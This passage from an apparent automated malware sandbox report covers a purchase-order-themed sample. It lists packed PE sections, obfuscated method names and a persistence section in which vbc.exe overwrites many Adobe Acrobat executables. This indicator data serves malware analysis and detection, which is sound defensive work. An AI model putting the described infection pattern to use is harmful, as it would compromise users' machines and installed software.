                  Source: Spectrum.exe.9.dr Static PE information: section name: .didat
                  Source: TieringEngineService.exe.9.dr Static PE information: section name: .didat
                  Source: vds.exe.9.dr Static PE information: section name: .didat
                  Source: VSSVC.exe.9.dr Static PE information: section name: .didat
                  Source: WmiApSrv.exe.9.dr Static PE information: section name: .didat
                  Source: wmpnetwk.exe.9.dr Static PE information: section name: .didat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_004AB81E push es; ret 9_2_004AB820
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_004A7371 push es; ret 9_2_004A737D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_004A6DDD pushad ; ret 9_2_004A6DE9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_004A53E6 push ecx; ret 9_2_004A53F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_004ABBBF push esi; ret 9_2_004ABBC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_0044B0B0 push es; ret 9_2_0044B0B1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_0044E11C push esi; iretd 9_2_0044E17C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_0044A9EB push eax; ret 9_2_0044AA27
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_0044BDFF pushad ; ret 9_2_0044BE0A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_0044F584 push esi; ret 9_2_0044F592
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_00449A40 push A3221A04h; ret 9_2_00449A45
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_0044E67F push es; ret 9_2_0044E685
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_0044B2E5 push esp; iretd 9_2_0044B2E6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_0044E703 push 8303313Dh; ret 9_2_0044E708
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_004679CF push es; mov dword ptr [esp], eax 9_2_00467A56
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_00462FCB push eax; iretd 9_2_00462FCD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_004646A1 push es; ret 9_2_004646A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_0044386C push 1000939Fh; ret 9_2_00443884
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_00423149 push eax; ret 9_2_00423179
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_0041C40C push cs; iretd 9_2_0041C4E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_0041C50E push cs; iretd 9_2_0041C4E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_004231C8 push eax; ret 9_2_00423179
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_0041C6BE push ebx; ret 9_2_0041C6BF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_00F4B180 push 00F4B0CAh; ret 9_2_00F4B061
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_00F4B180 push 00F4B30Dh; ret 9_2_00F4B1E6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_00F4B180 push 00F4B2F2h; ret 9_2_00F4B262
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_00F4B180 push 00F4B255h; ret 9_2_00F4B2ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_00F4B180 push 00F4B2D0h; ret 9_2_00F4B346
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_00F4B180 push 00F4B37Fh; ret 9_2_00F4B3B7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_00F4A915 push 00F48933h; ret 9_2_00F48930
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 9_2_00F4A915 push 00F48D6Dh; ret 9_2_00F48DFE
                  Source: RFQ_PO N89397-GM7287-Order.bat.exe Static PE information: section name: .text entropy: 7.887666262860419
                  Source: YRtQgzFlDnVSru.exe.0.dr Static PE information: section name: .text entropy: 7.887666262860419
                  Source: Aut2exe.exe.9.dr Static PE information: section name: .rsrc entropy: 7.800655830974613
                  Source: Aut2exe_x64.exe.9.dr Static PE information: section name: .rsrc entropy: 7.800504507977463
                  Source: AppVClient.exe.9.dr Static PE information: section name: .reloc entropy: 7.9365361070490295
                  Source: AutoIt3_x64.exe.9.dr Static PE information: section name: .reloc entropy: 7.943953658764053
                  Source: SciTE.exe.9.dr Static PE information: section name: .reloc entropy: 7.912336457307507
                  Source: jucheck.exe.9.dr Static PE information: section name: .reloc entropy: 7.931094323205373
                  Source: jusched.exe.9.dr Static PE information: section name: .reloc entropy: 7.936067113605391
                  Source: FXSSVC.exe.9.dr Static PE information: section name: .reloc entropy: 7.942287638561988
                  Source: elevation_service.exe.9.dr Static PE information: section name: .reloc entropy: 7.943956705190361
                  Source: elevation_service.exe0.9.dr Static PE information: section name: .reloc entropy: 7.9459835225835755
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.dr Static PE information: section name: .reloc entropy: 7.934784500246349
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.dr Static PE information: section name: .reloc entropy: 7.93478291358013
                  Source: SensorDataService.exe.9.dr Static PE information: section name: .reloc entropy: 7.935395435122308
                  Source: Spectrum.exe.9.dr Static PE information: section name: .reloc entropy: 7.9454653789250385
                  Source: AgentService.exe.9.dr Static PE information: section name: .reloc entropy: 7.937144343259236
                  Source: vds.exe.9.dr Static PE information: section name: .reloc entropy: 7.9410811809386175
                  Source: VSSVC.exe.9.dr Static PE information: section name: .reloc entropy: 7.939554200415346
                  Source: wbengine.exe.9.dr Static PE information: section name: .reloc entropy: 7.941302126952605
                  Source: wmpnetwk.exe.9.dr Static PE information: section name: .reloc entropy: 7.946626206660949
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.81e0000.4.raw.unpack, FZaOUuOPvnEAfIAr0M.cs High entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.81e0000.4.raw.unpack, GtaAIbrHXObmMm8GPA.cs High entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.81e0000.4.raw.unpack, kAOj1Y7pfP90kycNNw.cs High entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.4a424e8.1.raw.unpack, FZaOUuOPvnEAfIAr0M.cs High entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.4a424e8.1.raw.unpack, GtaAIbrHXObmMm8GPA.cs High entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.4a424e8.1.raw.unpack, kAOj1Y7pfP90kycNNw.cs High entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'

                  Persistence and Installation Behavior

                  Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\f1a1dcf99c90d829.bin
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
